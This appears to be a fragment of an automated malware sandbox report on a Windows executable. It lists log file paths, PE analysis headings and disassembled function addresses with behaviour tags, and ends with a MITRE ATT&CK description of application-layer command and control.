C:\Windows\pk_zip2.log

C:\Windows\pk_zip3.log

C:\Windows\pk_zip4.log

C:\Windows\pk_zip5.log

C:\Windows\pk_zip6.log

C:\Windows\pk_zip7.log

C:\Windows\pk_zip8.log

C:\Windows\pk_zip_alg.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
.exe

Function 00402DE3 Relevance: 52.6, APIs: 10, Strings: 20, Instructions: 143
threadsynchronizationtimeCOMMON

Function 00402CD3 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 94
networksleepprocessCOMMON

Function 00402100 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75
fileCOMMON

Function 00402797 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88
timeCOMMON

Function 00403E5F Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Function 0040257A Relevance: 56.2, APIs: 21, Strings: 11, Instructions: 185
networkstringCOMMON

Function 004017AD Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201
filestringCOMMON

Function 004028E2 Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 148
networkstringCOMMON

Function 004010A4 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 150
networkCOMMON

Function 00401ED9 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 176
COMMON

Function 00402FC3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 93
COMMON

Function 0040320E Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87
registryfilestringCOMMON

Function 004022EC Relevance: 15.2, APIs: 10, Instructions: 199
stringnetworkCOMMON

Function 00402A92 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 96
COMMON

Function 0040156C Relevance: 10.6, APIs: 7, Instructions: 108
memorynetworkCOMMON

Function 00402268 Relevance: 6.0, APIs: 4, Instructions: 47
sleepnetworkCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre